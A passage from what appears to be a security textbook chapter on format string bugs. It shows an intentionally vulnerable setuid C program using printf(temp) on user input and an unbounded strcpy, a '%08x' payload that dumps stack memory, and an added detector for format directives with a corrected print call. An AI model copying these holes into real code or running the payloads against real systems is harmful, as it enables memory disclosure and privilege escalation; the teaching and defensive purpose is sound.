#include <stdio.h>
#include <string.h>

static int canary; // placeholder "canary" value kept in the data section (see NOTE below)

int main(int argc, char *argv[]) {
  char temp[2048]; // string to hold large temp string
  strcpy(temp, argv[1]); // take argv1 input and jam into temp
  printf(temp); // print value of temp (user input used directly as the format string)
  printf("\n"); // print carriage return
  printf("Canary at 0x%08x = 0x%08x\n", &canary, canary); //print canary
}
#gcc -o fmtstr fmtstr.c
#./fmtstr Testing
Testing
Canary at 0x08049440 = 0x00000000
#chmod u+s fmtstr
#su joeuser
$
NOTE The "Canary" value in the code is just a placeholder for now. It is
important to realize that your value will certainly be different. For that matter,
your system may produce different values for all the examples in this chapter;
however, the results should be the same.
Reading from Arbitrary Memory
We will now begin to take advantage of the vulnerable program. We will start slowly and
then pick up speed. Buckle up, here we go!
Using the %x Token to Map Out the Stack
As shown in Table 8-1, the %x format token is used to print a hex value. So if we were
to supply a few %08x tokens to our vulnerable program, we should be able to dump
the stack values to the screen:
$ ./fmtstr "AAAA %08x %08x %08x %08x"
AAAA bffffd2d 00000648 00000774 41414141
Canary at 0x08049440 = 0x00000000
$
The 08 is the width specifier: each hex value is zero-padded to 8 characters wide, so every 4-byte stack word prints as a full 8-digit field.
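Added example (not code from the chapter): a small C checker that counts printf conversion directives in untrusted input, which is what an input filter or log-review rule would flag for a string like the "AAAA %08x %08x %08x %08x" above, alongside the corrected print call that passes user data as an argument instead of as the format. Function names and the sample input are my own; GCC's -Wformat-security also warns on the original printf(temp) at compile time.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Count printf conversion directives in an untrusted string.
   "%%" is a literal percent sign and is not counted; flags, width,
   precision, positional "n$" and length modifiers are skipped so that
   "%08x", "%2$08x" and "%n" each count as one directive. */
int count_format_directives(const char *s) {
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {          /* "%%" prints a literal '%' */
            p++;
            continue;
        }
        const char *q = p + 1;
        while (*q && strchr("-+ #0", *q)) q++;                 /* flags */
        while (*q && (isdigit((unsigned char)*q) || *q == '*' || *q == '$')) q++; /* width / position */
        if (*q == '.') {                                       /* precision */
            q++;
            while (*q && (isdigit((unsigned char)*q) || *q == '*')) q++;
        }
        while (*q && strchr("hlLqjzt", *q)) q++;               /* length modifiers */
        if (*q && strchr("diouxXeEfFgGaAcspn", *q)) {          /* conversion character */
            n++;
            p = q;
        }
    }
    return n;
}

/* The fix for the chapter's bug: user data is an argument, never the format.
   Returns the number of characters written, as printf does. */
int print_user_string(const char *s) {
    return printf("%s\n", s);
}

int main(int argc, char *argv[]) {
    /* constructed sample input, mirroring the stack-dump string from the text */
    const char *input = argc > 1 ? argv[1] : "AAAA %08x %08x %08x %08x";
    int n = count_format_directives(input);
    if (n > 0)
        fprintf(stderr, "warning: input contains %d format directive(s)\n", n);
    print_user_string(input);   /* prints the literal text, directives are not interpreted */
    return 0;
}
```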